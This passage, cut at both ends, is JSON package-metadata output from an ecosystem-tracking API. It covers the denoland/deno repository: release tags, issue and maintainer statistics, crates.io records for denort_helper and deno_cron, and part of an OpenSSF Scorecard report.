ttps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-07T01:53:11.038Z","dependent_packages_count":0,"downloads":89193,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":94.77467425530659,"dependent_repos_count":22.081976622554567,"dependent_packages_count":29.248628090484342,"stargazers_count":0.003754196655547094,"forks_count":0.05041349794591811,"docker_downloads_count":null,"average":29.231889332589397},"purl":"pkg:cargo/denort_helper","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/denort_helper","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/denort_helper","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/denort_helper/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-06T13:00:35.403Z","issues_count":6650,"pull_requests_count":9667,"avg_time_to_close_issue":17138573.200682055,"avg_time_to_close_pull_request":1530522.5908357133,"issues_closed_count":3810,"pull_requests_closed_count":8052,"pull_request_authors_count":589,"issue_authors_count":2489,"avg_comments_per_issue":2.5046616541353384,"avg_comments_per_pull_request":0.7208027309403124,"merged_pull_requests_count":7030,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":673,"past_year_pull_requests_count":1190,"past_year_avg_time_to_close_issue":1344289.2103004293,"past_year_avg_time_to_close_pull_request":1305317.8687782804,"past_year_issues_closed_count":233,"past_year_pull_requests_closed_count":663,"past_year_pull_request_authors_count":190,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2332838038632987,"past_year_avg_comments_per_pull_request":1.134453781512605,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":496,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/denort_helper/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/denort_helper/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/denort_helper/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/denort_helper/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/denort_helper/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/denort_helper/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-04-22T19:56:06.043Z","updated_at":"2025-04-22T19:56:06.043Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-04-16T21:46:22.304Z","updated_at":"2025-04-16T21:46:22.304Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":8525412,"name":"deno_cron","ecosystem":"cargo","description":"Implementation of the Deno cron API","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":138,"first_release_published_at":"2023-11-02T00:01:36.295Z","latest_release_published_at":"2026-08-27T15:22:09.447Z","latest_release_number":"0.138.0","last_synced_at":"2026-09-07T22:56:25.698Z","created_at":"2023-11-02T00:06:10.910Z","updated_at":"2026-09-07T22:56:25.698Z","registry_url":"https://crates.io/crates/deno_cron/","install_command":"cargo install deno_cron","documentation_url":"https://docs.rs/deno_cron/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel 